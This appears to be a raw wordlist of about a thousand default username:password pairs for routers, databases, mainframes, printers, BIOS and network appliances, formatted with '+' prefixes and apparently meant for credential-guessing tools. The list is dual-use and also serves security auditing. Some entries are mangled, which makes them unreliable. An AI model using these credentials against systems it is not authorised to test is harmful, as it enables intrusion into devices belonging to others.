+sa: +:public +:Master +setup:setup +root:default +:laflaf +cmaker:cmaker +enable: +MICRO:RSX +login:admin +:Posterie +write:private +root:attack +monitor:monitor +:private +:xdfk9874t3 +netopia:netopia +:Col2ogro2 +admin:microbusiness +op:op +adminview:OCS +op:operator +admin:secure +admin:atlantis +sysadmin:sysadmin +super:5777364 +echo:echo +craft: +adm:cascade +admin:default +maint:maint +comcast:1234 +CSG:SESAME +diag:danger +readonly:lucenttech2 +admin:operator +Manager: +debug:d.e.b.u.g +admin:hello +:SYSTEM +root:ascend +root:calvin +manuf:xxyyzz +cusadmin:highspeed +admin:123 +smc:smcadmin +admin:Sharp +root:password +sweex:mysweex +disttech:4tas +su:super +admin:system +root:changeme +poll:tech +sysadmin:password +SYSDBA:masterkey +anonymous: +:0000 +root:permit +admin:barricade +support:support +root:tslinux +admin:hp.com +recovery:recovery +USERID:PASSW0RD +eng:engineer +administrator:administrator +admin:pwp +admin:isee +NETWORK:NETWORK +JDE:JDE +admin:superuser +Guest: +:Super +admin:admin123 +super:surt +rwa:rwa +admin:123456 +admin:NetCache +:ADTRAN +USER:USER +test:test +admin:extendnet +admin:ironport +lp:lp +:Cisco +administrator: +admin:1111 +sysadmin:PASS +ro:ro +admin:Ascend +:_Cisco +MAIL:MAIL +ami: +:sitecom +hsa:hsadb +system:password +MGR:CAROLIAN +ADMINISTRATOR:ADMINISTRATOR +admin:sysAdmin +root:tini +admin:smcadmin +:Helpdesk +FIELD:SERVICE +PBX:PBX +netman: +HELLO:FIELD.SUPPORT +system:sys +hscroot:abc123 +1502:1502 +:star +superuser:admin +HELLO:MGR.SYS +sysadm:anicust +Administrator:Administrator +netrangr:attack +:Intel +:12345 +readwrite:lucenttech1 +:secret +piranha:piranha +wlse:wlsedb +admin:cisco +l3:l3 +admin:diamond +none:admin +naadmin:naadmin +public:public +admin:1988 +admin:radius +admin:root +NETOP: +Administrator:letmein +HELLO:MANAGER.SYS +:raidzone +:3ascotel +MANAGER:HPOFFICE +demo:demo +:166816 +User:Password +admin:zoomadsl +D-Link:D-Link +user:public +user:pass +l2:l2 +MGR:CCC +rw:rw +cgadmin:cgadmin +storwatch:specialist +:secure +vcr:NetVCR +OPERATOR:COGNOS +piranha:q +admin:synnet +MDaemon:MServer +root:cms500 +root:davox +jagadmin: +enquiry:enquirypw +at4400:at4400 +support:h179350 +davox:davox +admin:asd +PFCUser:240653C9467E45 +setup:changeme +superuser:superuser +:atc123 +aaa: +root:admin_1 +:266344 +MGR:WORD +topicalt:password +admin2:changeme +1234:1234 +MANAGER:ITF3000 +:connect +FIELD:HPONLY +nms:nmspw +client:client +admin:comcomcom +:speedxess +MGR:ROBELLE +:epicrouter +sys:uplink +OPERATOR:SYSTEM +field:support +MGR:SYS +root:letacla +:FORCE: +deskman:changeme +MAIL:REMOTE +SYSADM:sysadm +superadmin:secret +:backdoor +pmd: +MGR:CNAS +admin:22222 +GEN2:gen2 +:medion +ADMN:admn +Factory:56789 +PRODDTA:PRODDTA +tellabs:tellabs#1 +spcl:0 +dadmin:dadmin01 +:comcomcom +administrator:password +helpdesk:OCS +dhs3mt:dhs3mt +MGR:SECURITY +setup:changeme! +install:llatsni +adfexc:adfexc +IntraSwitch:Asante +manage:!manage +superman:21241036 +MANAGER:TELESUP +craft:crftpw +login:0 +:help +MGR:HPOFFICE +:lantronix +SPOOLMAN:HPOFFICE +manager:admin +:netadmin +ADVMAIL:HP +FIELD:SUPPORT +MANAGER:SYS +MGR:VESOFT +vt100:public +PSEAdmin:$secure$ +HELLO:OP.OPERATOR +Manager:friend +:hs7mwxkk +patrol:patrol +:SUPER +:SMDR +:1064 +teacher:password +PCUSER:SYS +MGR:ITF3000 +Any:12345 +OPERATOR:DISC +RSBCMON:SYS +cellit:cellit +MGR:INTX3 +inads:inads +halt:tlah +root:wyse +locate:locatepw +admin:visual +TMAR#HWMT8007079: +rapport:r@p8p0r+ +MGR:TELESUP +xbox:xbox +:TENmanUFactOryPOWER +device:device +NICONEX:NICONEX +admin:admin1234 +root:fivranne +acc:acc +31994:31994 +admin:netadmin +bcim:bcimpw +websecadm:changeme +blue:bluepw +topicnorm:password +supervisor:PlsChgMe +:R1QTPS +MGR:HPONLY +ccrusr:ccrusr +root:Cisco +login:password +266344:266344 +MAIL:MPE +telecom:telecom +MAIL:HPOFFICE +GEN1:gen1 +Administrator:smcadmin +SSA:SSA +:snmp-Trap +HTTP:HTTP +:default +mtch:mtch +admin:adslolitec +Administrator:ganteng +bciim:bciimpw +browse:browsepw +Admin:Admin +:Password +hydrasna: +sys:change_on_install +deskres:password +bbsd-client:changeme2 +anonymous:Exabyte +admin:rmnetlm +replicator:replicator +intel:intel +OPERATOR:SUPPORT +MGR:HPP196 +radware:radware +intermec:intermec +mlusr:mlusr +MGR:RJE +FIELD:LOTUS +init:initpw +e250:e250changeme +MAIL:TELESUP +Polycom:SpIp +temp1:password +:adminttd +tech:field +support:supportpw +mac: +:MiniAP +MANAGER:SECURITY +3comcso:RIP000 +RMUser1:password +WP:HPOFFICE +Administrator:changeme +MGR:XLSERVER +MGR:HPP187 +MGR:HPP189 +inads:indspw +admin:linga +craft:craft +:enter +NAU:NAU +rcust:rcustpw +admin:AitbISP4eCiG +mtcl:mtcl +MGR:CONV +topicres:password +bcnas:bcnaspw +MGR:NETBASE +admin:access +public: +adminuser:OCS +MGR:REGO +Root: +cac_admin:cacadmin +mediator:mediator +superman:talent +Anonymous: +kermit:kermit +admin:x-admin +MGR:HPDESK +:9999 +root:ROOT500 +admin:my_DEMARC +volition:volition +GlobalAdmin:GlobalAdmin +:4getme2 +LUCENT01:UI-PSWD-01 +admin:2222 +LUCENT02:UI-PSWD-02 +MANAGER:TCH +adminstat:OCS +desknorm:password +IntraStack:Asante +OPERATOR:SYS +MGR:COGNOS +:Fireport +:ILMI +maint:maintpw +supervisor:supervisor +e500:e500changeme +admin:mu +MANAGER:COGNOS +deskalt:password +admin:OCS +bbsd-client:NULL +cust:custpw +admin:noway +tiara:tiaranet +bcms:bcmspw +:TANDBERG +m1122:m1122 +telco:telco +superuser: +xd:xd +dhs3pms:dhs3pms +VNC:winterm +craft:craftpw +maint:rwmaint +anonymous:any@ +login:access +browse:looker +customer:none +cisco:cisco +adminstrator:changeme +FIELD:MANAGER +:1234admin +FIELD:MGR +ftp_nmc:tuxalize +me: +iclock:timely +echo:User +ADVMAIL:HPOFFICE:DATA +login:1111 +login:8429 +Administrator:manage +:Babylon +admin:hagpolm1 +root:12345 +scmadmin:scmchangeme +user:tivonpw +sysadm:Admin +Administrator:password +admin:administrator +installer:installer +webadmin:webadmin +ftp_inst:pbxk1064 +DDIC:19920706 +:pento +admin:NetSurvibox +SYSTEM:D_SYSTPW +draytek:1234 +:3477 +operator:$chwarzepumpe +administrator:asecret +EARLYWATCH:SUPPORT +:10023 +Manager:Admin +super.super: +ftp_oper:help1954 +corecess:corecess +superuser:123456 +admin:Password +super.super:master +admin:Protector +SYSTEM:MANAGER +webadmin:1234 +install:secret +FIELD:HPWORD:PUB +admin:12345 +admin:symbol +weblogic:weblogic +Admin:1988 +system/manager:sys/change_on_install +root:3ep5w2u +:8111 +:jannie +End:User:123 +none:0 +d.e.b.u.g:User +admin:tomcat +target:password +Administrator:pilou +MD110:help +Administrator:3ware +:ANYCOM +tiger:tiger123 +adminttd:adminttd +admin:asante +admin:smallbusiness +admin:netscreen +FIELD:HPP187:SYS +guest:User +maint:ntacdmax +admin:w2402 +wlseuser:wlsepassword +SAPCPIC:admin +ftp_admi:kilo1987 +admin:articon +mtcl: +default.password: +admin:michelangelo +manager:changeme +root:Mau'dib +:Serial:Num +root:ggdaseuaimhrke +7:maintain +2:syslib +ADMIN:admin +system:weblogic +Administrator:ggdaseuaimhrke +ADMIN: +itsadmin:init +PUBSUB:PUBSUB +admin:demo +system:manager +sys:sys +CTXSYS:CTXSYS +ftp: +bill:bill +192.168.1.1:60020:@dsl_xilno +FIELD: +admin:dmr99 +setpriv:system +GUEST:GUEST +SAP*:06071992 +operator:1234 +t3admin:Trintech +hello:hello +supervisor: +CISCO15:otbu+1 +1.79:Multi +:babbit +mso:w0rkplac3rul3s +Telecom:Telecom +qsysopr:qsysopr +admin:TANDBERG +admin:imss7.0 +:nokia +APPS:APPS +Developer:isdev +mail:mail +admin:draadloos +qsecofr:qsecofr +11111:x-admin +:default.password +Service:5678 +enable:cisco +netadmin:nimdaten +Polycom:456 +admin:P@55w0rd! +admin:1234admin +root:par0t +any:system +db2fenc1:db2fenc1 +johnson:control +2:maintain +isp:isp +demos: +QSRV:QSRV +root:iDirect +MDSYS:MDSYS +Admin:123456 +2:manager +vpasp:vpasp +TEST:TEST +:Telecom +QSECOFR:QSECOFR +adm:none +:2501 +1:syslib +system:security +admin:leviton +!root:blank +informix:informix +root:mpegvideo +5:games +root:0P3N +engmode:hawk201 +scout:scout +qpgmr:qpgmr +admin:admin000 +ADSL:expert03 +cisco: +images:images +admin:security +admin:surecom +Gearguy:Geardog +:symantec +comcast: +admin:adslroot +1:manager +Demo: +:xyzzy +Administrator:adaptec +system:system +SAP*:PASS +serial#:serial# +BACKUP:BACKUP +stratacom:stratauser +root:rootme +6.x: +root:!root +webadmin:webibm +:riverhead +mary:password +COMPANY:COMPANY +SYS:SYS +DSL:DSL +Jetform: +none:amber +eagle:eagle +ROUTER: +root:brightmail +admin:pass +:HEWITT:RAND +ods:ods +siteadmin:toplayer +admin:OkiLAN +root:rootpass +Alphanetworks:wrgg15_di524 +:x40rocks +:nokai +Admin1:Admin1 +field:field +Admin:admin +Admin:ImageFolio +:iolan +:manager +admin:pfsense +janta:sales:janta211 +servlet:manager +username:password +citel:password +Replicator:iscopy +SYSMAN:OEM_TEMP +1:operator +SYSTEM:SYSTEM +administrator:RSAAppliance +master:themaster01 +Admin:1234 +2:operator +SUPERUSER:ANS#150 +admin:passwort +cn=orcladmin:welcome +30:games +maintainer:admin +setup: +:hello +admin:NetSeq +BRIO_ADMIN:BRIO_ADMIN +:citel +internal:oracle +CQSCHEMAUSER:PASSWORD +root:kn1TG7psLu +SYS:SYSPASS +:lkwpeter +DEV2000_DEMOS:DEV2000_DEMOS +FSFTASK1: +checkfs:checkfs +BACKUP: +USER1:USER1 +root:TENmanUFactOryPOWER +SQLDBA: +root:resumix +HELP:HELP +toor:logapp +SYS:0RACLE9 +SYS:0RACLE8 +:57gbzb +!root:none +qsrvbas:qsrvbas +SYSADMIN: +EZsetup: +Administrator:1234 +:sldkj754 +BATCH: +STRAT_USER:STRAT_PASSWD +Administrator:19750407 +:User +user:USERP +primenet:primeos +OEMREP:OEMREP +admin:[^_^] +USER6:USER6 +lynx: +:TTPTHA +powerdown:powerdown +root:Mau’dib +SYSTEM:ORACL3 +$ALOC$: +password: +VOL-0215: +admin:nimda +tomcat:tomcat +REP_MANAGER:DEMO +WinCCConnect:2WSXcder +ALLIN1:ALLIN1 +DIRMAINT: +eqadmin::Serial:port:only:equalizer +sysadm:sysadmpw +QSRVBAS:QSRVBAS +admin:ip305Beheer +debug:tech +:ACCORD +AQJAVA:AQJAVA +LASERWRITER:LASERWRITER +Administrator:0000 +root:nsi +PERFSTAT:PERFSTAT +apcuser:apc +MBWATCH:MBWATCH +:protection +system_admin: +unix:unix +OWNER:OWNER +NETPRIV:NETPRIV +VSEMAINT: +:AWARD?SW +DEMO:DEMO +tomcat:changethis +SYMPA:SYMPA +REP_OWNER:REP_OWNER +DCL:DCL +FAX: +root:dbps +ARCHIVIST:ARCHIVIST +USER:PASSWORD +VTAMUSER: +LASERWRITER: +VMTAPE: +basisk:basisk +NetLinx:password +OutOfBox:demos:guest:4DGifts:(none:by:default) +none:letmein +NETMGR:NETMGR +DEFAULT:USER +OAS_PUBLIC:OAS_PUBLIC +read: +AP:AP +demos:demos +SYSTEM:Admin +admin:j5Brn9 +MTSSYS:MTSSYS +SYSMAINT:DIGITAL +AUDIOUSER:AUDIOUSER +Joe:hello +IDMS: +:teX1 +admin:allot +$SRV:$SRV +snake: +SYS:0RACLE +ADVMAIL: +Administrator:nicecti +ROOT:ROOT +PRINTER:PRINTER +shutdown: +satan: +:m1link +RDM470: +master:access +:l2 +:l1 +trouble:trouble +fax: +OP1: +admin@example.com:admin +root:trendimsa1.0 +HOST:HOST +ADLDEMO:ADLDEMO +QS_ADM:QS_ADM +bin:sys +:AMI +OPER:OPER +oracle: +jj: +PO7:PO7 +SYSTEM:0RACLE8 +SYSTEM:0RACLE9 +www: +joe:password +:komprie +:123 +MAINT:MAINT +CMSBATCH: +root:toor +CCC: +role1:tomcat +DATAMOVE: +lp: +:AMISETUP +:sp99dd +halt:halt +MSHOME:MSHOME +ISPVM: +crowd­-openid-­server:password +user_editor:demo +sedacm:secacm +ROOT: +Admin:3Com +db2admin:db2admin +Airaya:Airaya +supervisor:visor +none:Wireless +SYSDUMP1: +IMEDIA:IMEDIA +:Biostar +install:install +primos_cs:primos +admin:infrant1 +Administrator:Partner +:Administrative +USER_TEMPLATE:USER_TEMPLATE +pnadmin:pnadmin +:h6BB +lpadmin:lpadmin +guest:none +VTAM:VTAM +TRACESVR:TRACE +POSTMASTER:POSTMASTER +MAILER:MAILER +RSCSV2: +QS_WS:QS_WS +:sma +system_admin:system_admin +circ: +Demo:password +:rwa +nobody:nobody +Tasman:Tasmannet +admin:!admin +DISCOVERER_ADMIN:DISCOVERER_ADMIN +VMASMON: +LR-ISDN:LR-ISDN +TURBINE:TURBINE +GL:GL +PO:PO +:AMI_SW +super:superpass +PRINT: +MODTEST:YES +GATEWAY:GATEWAY +root:system +PRIMARY:PRIMARY +both:tomcat +:award.sw +haasadm:lucy99 +pw:pwpw +games:games +DOCSIS_APP:3Com +bbs: +EMP:EMP +Admin:cclfb +postmaster: +SITEMINDER:SITEMINDER +Any:Any +vgnadmin:vgnadmin +RJE:RJE +gonzo: +NEWS:NEWS +sa:Ektron +:Award +AQUSER:AQUSER +UTLBSTATU:UTLESTAT +:AMIAMI +netbotz:netbotz +CTXSYS:CHANGE_ON_INSTALL +xmi_demo:sap123 +:Crystal +:Daewuu +ftp:ftp +ORACACHE:(random:password) +MCUser:MCUser1 +prash:hello +sync: +sysadm:admpw +root:rootadmin +PM:PM +AP2SVP: +master:master +ibm:2222 +ULTIMATE:ULTIMATE +SABRE: +role1:role1 +user_pricer:demo +admin:enhydra +SUPERVISOR:NF +EVENT:EVENT +:xyzall +:rainbow +ADMIN:JETSPEED +SYS:ORACL3 +PORTAL30_SSO_PS:PORTAL30_SSO_PS +FSFADMIN: +OO:OO +WKSYS:WKSYS +OPERATNS:OPERATNS +:ksdjfg934t +UVPIM_: +:merlin +OE:OE +Any:Local:User:Local:User:password +OCITEST:OCITEST +web: +:HLT +ADMINISTRATOR:admin +ESSEX: +:last +CTXSYS: +None:xyzzy +CTXDEMO:CTXDEMO +user_designer:demo +:Admin +:zebra +QDBA:QDBA +role:changethis +LRISDN:LRISDN +tele:tele +WEBCAL01:WEBCAL01 +rsadmin:rsadmin +OMWB_EMULATION:ORACLE +root:alien +WINDOWS_PASSTHRU: +:sanfran +public:ReadOnly:access:secret +:AMIPSWD +MOREAU:MOREAU +fast:abd234 +root:QNX +host:dnnhost +administrator:root +admin:public +SYSTEM:ORACLE +:sertafu +ORDPLUGINS:ORDPLUGINS +SYSWRM: +mail: +:telos +ADMIN:ADMIN +administrator:adminpass +savelogs:crash +:ACCESS +SDOS_ICSAP:SDOS_ICSAP +system:adminpwd +BATCH:BATCH +GUEST:GUESTGUEST +SYSMAINT:SYSMAINT +postmaster:postmast +DSSYS:DSSYS +:award_ps +:ZAAADA +MGWUSER:MGWUSER +:NTCIP +OPERATOR: +:hewlpack +TDOS_ICSAP:TDOS_ICSAP +ssp:ssp +EJSADMIN:EJSADMIN +:damin +INGRES:INGRES +DS: +:A.M.I +estheralastruey: +:1322222 +VCSRV:VCSRV +Administrator:storageserver +ssladmin:ssladmin +CLARK:CLOTH +shutdown:shutdown +administrator:1234 +OEMADM:OEMADM +restoreonly:restoreonly1 +quser:quser +PRINTER: +MILLER:MILLER +trmcnfg:trmcnfg +REPORT:REPORT +user_author:demo +:aLLy +dpn:changeme +tour:tour +mountfsys:mountfsys +http: +PROG:PROG +:iwill +openfiler:password +:Public +admin:mp3mystic +RAID:hpt +read:synnet +admin:peribit +STARTER:STARTER +FAXUSER: +GUEST:GUESTGUE +DSA: +:guardone +daemon:daemon +mountsys:mountsys +SYSTEM:ORACLE9 +SYSTEM:ORACLE8 +:gandalf +backuponly:backuponly1 +IVPM1: +:leaves +sysadm:syspw +root:blablabla +:Compleri +USER3:USER3 +OPENSPIRIT:OPENSPIRIT +:spooml +:changeit +:wg +prime:primeos +HPLASER: +:Vextrex +CSPUSER: +qsvr:qsvr +lynx:lynx +SYSCKP: +root:letmein +Sysop:Sysop +user_marketer:demo +IMAGEUSER:IMAGEUSER +root:Password +bsxuser:bsxpass +MASTER:PASSWORD +USER9:USER9 +root:ax400 +OLAPSYS:MANAGER +SYSTEM:OPERATOR +oracle:oracle +root:Mau?dib +:MASTER +root:t00lk1t +rsadmin: +:Daytec +OutOfBox: +:SZYX +:cmaker +:CTX_123 +rje:rje +ODM_MTR:MTRPW +QS_ES:QS_ES +lansweeperuser:mysecretpassword0* +DEMO3: +Username:password +GPLD:GPLD +uucp:uucp +DBSNMP:DBSNMP +VMARCH: +GUEST:TSEUG +SWUSER:SWUSER +root:8RttoTriz +VTAM: +OPERATNS: +Operator:Operator +CHEY_ARCHSVR: +SYS:ORACLE +roo:honey +n.a:guardone +accounting:accounting +backuprestore:backuprestore1 +PRINT:PRINT +:j322 +:Craftr4 +dni:dni +WEBADM:password +iceman: +guru:*3noguru +FAX:FAX +anon:anon +:j256 +USER8:USER8 +root:honey +PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC +:589721 +postgres: +WINSABRE:WINSABRE +USERP:USERP +none:public +Admin:shs +SYS:MANAGER +IVPM2: +PORTAL30_SSO:PORTAL30_SSO +ALLIN1MAIL:ALLIN1MAIL +POST: +TEMP: +:xo11nE +admin:nms +SYSADM:SYSADM +BATCH1: +me:me +SUPERVISOR:NFI +PROMAIL: +SECDEMO:SECDEMO +ARAdmin:AR#Admin# +sadmin: +ORAREGSYS:ORAREGSYS +VMASSYS: +man: +FROSTY:SNOWMAN +LASER:LASER +tutor: +:?award +root:changethis +DISKCNT: +default:WLAN_AP +SYSERR: +WWW:WWW +VAX:VAX +none:none +:Cable-docsis +PROCAL: +SUPERVISOR:SYSTEM +FAXWORKS: +ibm:password +CTXSYS:UNKNOWN +LDAP_Anonymous:LdapPassword_1 +(any:3:chars):cascade +games: +User:1234 +:Zenith +setup/snmp:setup/nopasswd +DSGATEWAY:DSGATEWAY +AWARD_SW: +CSMIG:CSMIG +:year2000 +umountfsys:umountfsys +:BIGO +root:jstwo +VMS:VMS +dni: +bpel:bpel +viewuser:viewuser1 +admin:ISPMODE +TDISK: +politically:correct +user_analyst:demo +admin:conexant +guest:1234 +root:logapp +admin:ip3000 +RSCS: +COMPIERE:COMPIERE +OSP22:OSP22 +guest1:guest1 +FORSE:FORSE +:lesarotl +factory:factory +bubba:(unknown) +admin:ip20 +admin:ip21 +LASER: +QUSER:QUSER +:AWARD:SW +primeos:prime +admin:tr650 +poll:poll +:j262 +:xljlbj +glftpd:glftpd +:Advance +RMAN:RMAN +mountfs:mountfs +DIRECT: +:console +firstsite:firstsite +:SW_AWARD +IPFSERV: +:snake +Administrator:Gateway +TSUSER:TSUSER +BATCH2: +admin:123123 +:3098z +:cc +snmp:nopasswd +WebAdmin:WebBoard +IBMUSER:SYS1 +SMART: +voadmin:manager +BC4J:BC4J +core:phpreactor +OPERVAX:OPERVAX +Bobo:hello +:Congress +:central +WANGTEK:WANGTEK +disttech:etas +OWA:OWA +USER2:USER2 +jasperadmin:jasperadmin +FIELD:DIGITAL +root:uClinux +guest:guestgue +FAXUSER:FAXUSER +WINSABRE:SABRE +VMBSYSAD: +admin:ip400 +PVM: +ctb_admin:sap123 +:AMI.KEY +:AMI.KEZ + :ANYCOM +USER_TEMPLATE: +DEMO4: +:inuvik49 +QSRV:11111111 +qsrv:qsrv +superdba:admin +PORTAL30:PORTAL31 +PORTAL30:PORTAL30 +XPRT:XPRT +Crowd:password +User:19750407 +18364: +:zjaaadc +ilom-admin:ilom-admin +rdc123:rdc123 +sysopr:sysopr +tasman:tasmannet +SYSTEM:0RACLE8I +:Cisco:router +admin:store +:SER +blank:blank +ADMIN:PASSWORD +admin:IP:address +WEBREAD:WEBREAD +ODM:ODM +11111111:11111111 +prime:prime +AURORA$ORB$UNAUTHENTICATED:INVALID +ADAMS:WOOD +root:vertex25 +sys:bin +lp:lineprin +Craft:crftpw +www:www +postgres:dbpass +rfmngr:$rfmngr$ +sync:sync +WANGTEK: +:1988 +MAINT: +SYSTEST_CLIG:SYSTEST +user:user0000 +user_approver:demo +ilom-operator:ilom-operator +Nice-admin:nicecti +:HELGA-S +answer: +NETNONPRIV:NETNONPRIV +nuucp: +CIDS:CIDS +VASTEST: +primenet:primenet +redline:redline +:rw +spcl:0000 +admin:muze +MBMANAGER:MBMANAGER +webmaster: +APPLSYS:FND +:ro +WINDOWS_PASSTHRU:WINDOWS_PASSTHRU +USER4:USER4 +hqadmin:hqadmin +UOMNI_: +FIELD:TEST +sys:system +Admin:123qwe +VMUTIL: +POST:BASE +:dn_04rjc +uucpadm:uucpadm +halt: +FAXWORKS:FAXWORKS +admin:password1 +EXFSYS:EXFSYS +4Dgifts: +JMUSER:JMUSER +admin:imsa7.0 +SUPERVISOR:NETFRAME +CIS:CIS +UNITY_: +:ciscofw +HLW:HLW +admin:brocade1 +pwrchute:pwrchute +:setup +:Tiny +IDMSSE: +postgres:svcPASS83 +NSA:nsa +!root:!ishtar +admin:blank +root:NeXT +TELEDEMO:TELEDEMO +:AMIDECOD +recover:recover +TRAVEL:TRAVEL +lexar: +:efmukl +viewer: +LIBRARY: +admin:raritan +PO8:PO8 +root@localhost:root +NAMES:NAMES +secofr:secofr +PDMREMI: +:biostar +MGE:VESOFT +USER7:USER7 +OWA_PUBLIC:OWA_PUBLIC +questra:questra +builtin:builtin +SFCNTRL: +SAP*:6071992 +boss:boss +anonymous:password +:isolation +:Q54arwms +PLEX:PLEX +OLAPDBA:OLAPDBA +:g6PJ +OLAPSVR:INSTANCE +user_expert:demo +root:pixmet2003 +Bhosda:Lund +TEST: +qsvr:ibmcel +CMSBATCH:CMSBATCH +:ABCD +gropher: +:AM +administrator:admin +:condo +:Toshiba +:familymacintosh +TAHITI:TAHITI +NEWINGRES:NEWINGRES +:AMI?SW +:mMmM +man:man +VM3812: +root:powerapp +ibm:service +VIF_DEVELOPER:VIF_DEV_PWD +ADMIN:WELCOME +Admin:Barricade +joeuser:joeuser +system:isp +IPC: +HELPDESK:HELPDESK +wlpisystem:wlpisystem +TSAFVM: +prtgadmin:prtgadmin +SYSTEM:CHANGE_ON_INSTALL +:CONCAT +:t0ch88 +webmaster:webmaster +:djonet +ADMIN:changeme +Any: +:Compaq +UAMIS_: +theman:changeit +CISINFO:CISINFO +mobile:dottie +QS_CB:QS_CB +CDEMORID:CDEMORID +tech:nician +DEMO2: +administrator:none +SYS:MANAG3R +End:User:7936 +PORTAL30_PUBLIC:PORTAL30_PUBLIC +sysadmin:nortel +SYS:D_SYSTPW +SYSTEM:SYSPASS +Guest:blank +User:User +MDDEMO_CLERK:CLERK +FIELD:FIELD +Admin:SECRET123 +Guest:Guest +PHANTOM: +admin:amigosw1 +:xmux +write: +ADMINISTRATOR:SENTINEL +system:field +:ducati900ss +qsecofr:22222222 +:lkw:peter +:awkward +:TzqF +SYSTEST_CLIG:SYSTEST_CLIG +ODS:ODS +admin:axis2 +BLAKE:PAPER +TSDEV:TSDEV +PRODBM: +admin:letmein +:joh316 +dos:dos +login:0000 +APL2PP: +system:hdms +admin:phplist +god1:12345 +admin:novell +CICSUSER:CISSUS +22222222:22222222 +root:passw0rd +user_publisher:demo +OSE$HTTP$ADMIN:(random:password) +def:trade +SuperUser:kronites +QS_CBADM:QS_CBADM +SYSA:SYSA +:00000000 +STUDENT:STUDENT +Draytek:1234 +SMDR:SECONDARY +EREP: +VSEMAN: +:OOOOOOOO +primos_cs:prime +demo: +fwadmin:xceladmin +:j64 +MTS_USER:MTS_PASSWORD +:AWARD_SW +AQDEMO:AQDEMO +private:ReadWrite:access:secret +:GWrv +:MagiMFP +:SnuFG5 +IS_$hostname:IS_$hostname +HPSupport:badg3r5 +ORASSO:ORASSO +GATEWAY: +:t0ch20x +CVIEW: +SH:SH +:zeosx +XXSESS_MGRYY:X#1833 +:wodj +:FOOBAR +SYSMAN:SYSMAN +VMMAP: +admin:urchin +PORTAL30_DEMO:PORTAL30_DEMO +Ezsetup: +QS_CS:QS_CS +administrator:PlsChgMe! +CMSUSER: +:MCUrv +DEMO1: +admin:adminadmin +userNotUsed:userNotU +:AMI~ +root:ibm +ncadmin:ncadmin +TESTPILOT:TESTPILOT +:Polrty +fg_sysadmin:password +UETP:UETP +QS:QS +DBI:MUMBLEFRATZ + :ILMI +SYSTEM:SYS +JWARD:AIROPLANE +APPS_MRC:APPS_MRC +:uboot +Moe:hello +SENTINEL:SENTINEL +admin:netgear1 +Yak:asd123 +PDP11:PDP11 +:aammii +Flo:hello +SLIDE:SLIDEPW +root:bagabu +primeos:primeos +:Spacve +:256256 +INFO:INFO +checkfsys:checkfsys +PRODCICS:PRODCICS +:foolproof +:AWARD_PW +MXAGENT:MXAGENT +SYSTEM:ORACLE8I +admin:no:password +VMTLIBR: +POWERCARTUSER:POWERCARTUSER +VMBACKUP: +CPNUC: +:QDI +:shiva +distrib:distrib0 +SUPERVISOR:SUPERVISOR +SYSMAINT:SERVICE +MIGRATE:MIGRATE +CDEMOUCB:CDEMOUCB +system:prime +QSRV:22222222 +:c +OLTSEP: +sysbin:sysbin +signa:signa +autocad:autocad +:SWITCHES_SW +WEBDB:WEBDB +daemon: +:aPAf +ncrm:ncrm +SAMPLE:SAMPLE +:1 +HCPARK:HCPARK +ALLINONE:ALLINONE +nm2user:nm2user +SAVSYS: +IIPS: +PATROL:PATROL +:technolgi +:MBIU0 +mailadmin:secret +adm:adm +TMSADM: +tutor:tutor +ESubscriber: +CHEY_ARCHSVR:CHEY_ARCHSVR +write:synnet +software:software +admin:welcome +god2:12345 +bbs:bbs +:Dell +disttech:disttech +FSFTASK2: +:zbaaaca +:prost +ORDSYS:ORDSYS +Administrator:administrator +:1234567890 +gopher:gopher +PSFMAINT: +SYSTEM:MANAG3R +:RM +:s!a@m#n$p%c +EAdmin: +12345:12345 +DECNET:DECNET +OPERATIONS:OPERATIONS +$system: +REP_OWNER:DEMO +PANAMA:PANAMA +LIBRARIAN:SHELVES +SYSTEM:0RACLE +fal: +4Dgifts:4Dgifts +:biosstar +NETSERVER:NETSERVER +:tiny +root:TANDBERG +POWERCHUTE:APC +USER5:USER5 +GPFD:GPFD +:12345678 +blank:admin +QS_OS:QS_OS +sysadm:admin +REPADMIN:REPADMIN +Administrator:12345678 +0:0 +DEMO8:DEMO8 +DEMO9:DEMO9 +CDEMO82:CDEMO82 +admin:boca:raton +Administrator:vision2 +administrator:0 +umountsys:umountsys +snmp:snmp +Username:PASSWORD +volition: +USER0:USER0 +CDEMOCOR:CDEMOCOR +SYSTEST:UETP +Rodopi:Rodopi +DECNET:NONPRIV +user_checker:demo +:tatercounter2000 +qserv:qserv +:ESSEX:or:IPC +AQ:AQ +support: +SAPR3:SAP +VRR1:VRR1 +fastwire:fw +admi:admin +FINANCE:FINANCE +WinCCAdmin:2WSXcder +ESTOREUSER:ESTORE +fax:fax +VIRUSER:VIRUSER +LINK:LINK +APPLSYSPUB:FNDPUB +:BIOS +SYS:ORACLE8 +SYS:ORACLE9 +overseer:overseer +checksys:checksys +umountfs:umountfs +DBDCCICS:DBDCCIC +Admin:password +:x6zynd56 +TOAD:TOAD +root:mozart +ntpupdate:ntpupdate +root:router +MDDEMO_MGR:MGR +ARCHIVIST: +SUPERVISOR:HARRIS +:11111 +billy-bob: +lp:bin +DECMAIL:DECMAIL +alien:alien +admin:dnnadmin +nsroot:nsroot +AdvWebadmin:advcomm500349 +dvstation:dvst10n +SERVICECONSUMER1:SERVICECONSUMER1 +MMO2:MMO2 +qsecofr:11111111 +NOC:NOC +WWWUSER:WWWUSER +root::Serial:port:only: +SAP:SAPR3 +root:t0talc0ntr0l4! +NEVIEW: +MAIL: +ODSCOMMON:ODSCOMMON +fal:fal +pixadmin:pixadmin +ripeop: +PENG: +:BIOSPASS +netlink:netlink +L2LDEMO:L2LDEMO +OUTLN:OUTLN +12.x: +scott:tiger:or:tigger +:toshy99 +dbase:dbase +:nz0u4bbe +fam:fam +:bell9 +Oper:Oper +RMAIL:RMAIL +administrator:19750407 +FND:FND +admin:exinda +PRIV:PRIV +admin:barney +SETUP: +:biodata +:24Banc81 +news:news +VSEIPO: +:j09F +pw:pw +GUEST: +ilon:ilon +:award_? +SYS:0RACLE39 +SYS:0RACLE38 +DEFAULT:DEFAULT +:AMI!SW +PLSQL:SUPERSECRET +root:alpine +politcally:correct +18140815:18140815 +APPUSER:APPUSER +SUPERVISOR: +CENTRA:CENTRA +LBACSYS:LBACSYS +:alfarome +PDP8:PDP8 +SFCMI: +administrator:*:*:# +lpadm:lpadm +Test:Everything: +bewan:bewan +:2580 +DIP:DIP +:Sxyz +mfd:mfd +MDDEMO:MDDEMO +:intermec +:589589 +SWPRO:SWPRO +DES:DES +root:fibranne +Coco:hello +GCS: +rodopi:rodopi +:touchpwd= +Scott:Tiger +Admin5:4tugboat +admin:funkwerk +ANDY:SWORDFISH +DESQUETOP: +nobody: +Manager:657 +:mysweex 